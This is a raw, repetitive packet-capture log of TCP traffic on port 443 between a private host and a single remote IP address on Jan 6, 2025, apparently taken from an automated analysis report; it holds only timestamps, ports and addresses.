                                                  Jan 6, 2025 04:50:45.279827118 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.279827118 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.284887075 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.284940958 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.284955025 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.284965038 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.284993887 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.285017014 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.287302971 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.287353039 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.287403107 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.287456989 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.290893078 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.290925026 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.290951014 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.290956020 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.290987015 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.291007042 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.294214964 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.294275045 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.294318914 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.294378042 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.298988104 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.299021006 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.299052000 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.299056053 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.299115896 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.299139023 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.301220894 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.301266909 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.301275969 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.301281929 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.301314116 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.301340103 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.303354025 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.303416014 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.303459883 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.303513050 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.307089090 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.307128906 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.307156086 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.307159901 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.307197094 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.307215929 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.327574015 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.327636003 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.327688932 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.327742100 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.333072901 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.333142996 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.333163023 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.333231926 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.338767052 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.338845015 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.338860035 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.338916063 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.344480038 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.344515085 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.344557047 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.344563007 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.344599009 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.344610929 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.348491907 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.348522902 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.348551035 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.348560095 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.348588943 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.348607063 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.354295969 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.354326963 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.354345083 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.354402065 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.354410887 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.354454994 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.359900951 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.359941959 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.359963894 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.359968901 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.360003948 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.360023022 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.365706921 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.365792990 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.365931034 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.365981102 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.371723890 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.371819973 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.371866941 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.371923923 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.374214888 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.374258041 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.374288082 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.374293089 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.374322891 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.374344110 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.377587080 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.377631903 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.377669096 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.377675056 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.377712965 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.377726078 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.381021976 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.381052971 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.381083965 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.381088018 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.381119013 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.381145954 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.385770082 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.385824919 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.385880947 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.385958910 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.387895107 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.387949944 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.387999058 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.388055086 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.390113115 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.390163898 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.390275955 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.390332937 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.393727064 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.393783092 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.393898010 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.393969059 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.414213896 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.414263964 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.414299965 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.414304018 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.414350033 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.414366007 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.419775009 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.419833899 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.419903994 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.419949055 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.423496008 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.425530910 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.425581932 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.425600052 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.425604105 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.425648928 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.431169033 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.431231022 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.431294918 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.431346893 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.435230970 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.435286999 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.435318947 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.435391903 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.440973997 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.441042900 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.441071033 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.441123962 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.446851969 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.446872950 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.446907043 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.446911097 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.446939945 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.446962118 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.452627897 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.452657938 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.452687025 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.452691078 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.452718973 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.452738047 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.458600998 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.458636045 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.458652020 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.458656073 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.458694935 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.458709002 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.461260080 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.461294889 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.461308002 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.461316109 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.461338043 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.461354971 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.464437962 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.464474916 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.464504004 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.464509964 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.464534998 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.464555979 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.467819929 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.467886925 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.467947006 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.467995882 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.472487926 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.472532988 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.472570896 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.472618103 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.474718094 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.474765062 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.474841118 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.474889040 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.477061987 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.477107048 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.477118969 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.477123022 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.477153063 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.477161884 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.480644941 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.480673075 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.480688095 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.480691910 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.480725050 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.480745077 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.501030922 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.501085043 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.501096010 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.501138926 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.506716013 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.506748915 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.506777048 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.506788015 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.506808043 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.506958008 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.512434959 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.512484074 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.512515068 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.512563944 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.512634039 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.518047094 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.518094063 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.518105030 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.518114090 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.518152952 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.518163919 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.522041082 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.522089005 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.522119999 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.522162914 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.522212029 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.527955055 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.527990103 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.528012991 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.528017998 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.528048038 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.528063059 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.533541918 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.533595085 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.533601999 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.533607960 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.533636093 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.533654928 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.539376974 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.539427996 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.539436102 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.539483070 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.545370102 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.545413971 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.545428991 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.545496941 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.547769070 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.547815084 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.547821045 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.547827005 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.547869921 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.551264048 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.551309109 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.551322937 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.551330090 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.551357985 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.551373005 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.554681063 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.554713011 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.554745913 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.554753065 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.554765940 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.554795980 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.555603027 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.559247971 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.559304953 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.561464071 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.561518908 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.561541080 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.561592102 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.563803911 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.563858986 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.563898087 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.563946962 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.567367077 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.567420959 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.567450047 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.567493916 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.587807894 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.587872982 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.587888956 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.587934017 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.593349934 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.593385935 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.593404055 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.593410969 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.593426943 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.593450069 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.599193096 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.599253893 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.599299908 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.599350929 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.604728937 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.604770899 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.604825020 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.604825020 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.604835987 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.604847908 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.604876995 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.608828068 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.608871937 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.608881950 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.608887911 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.608916044 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.608936071 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.614659071 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.614708900 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.614746094 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.614793062 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.620368958 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.620414019 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.620424032 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.620433092 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.620464087 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.620498896 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.626194954 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.626220942 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.626250029 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.626254082 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.626279116 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.626291990 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.631973982 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.632020950 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.632080078 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.632124901 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.634412050 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.634452105 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.634490013 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.634533882 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.637856007 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.637903929 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.637949944 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.637994051 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.641179085 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.641242027 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.641288042 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.641340017 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.646044970 CET4434996239.103.20.26192.168.2.6
                                                  Jan 6, 2025 04:50:45.646091938 CET49962443192.168.2.639.103.20.26
                                                  Jan 6, 2025 04:50:45.646104097 CET4434996239.103.20.26192.168.2.6
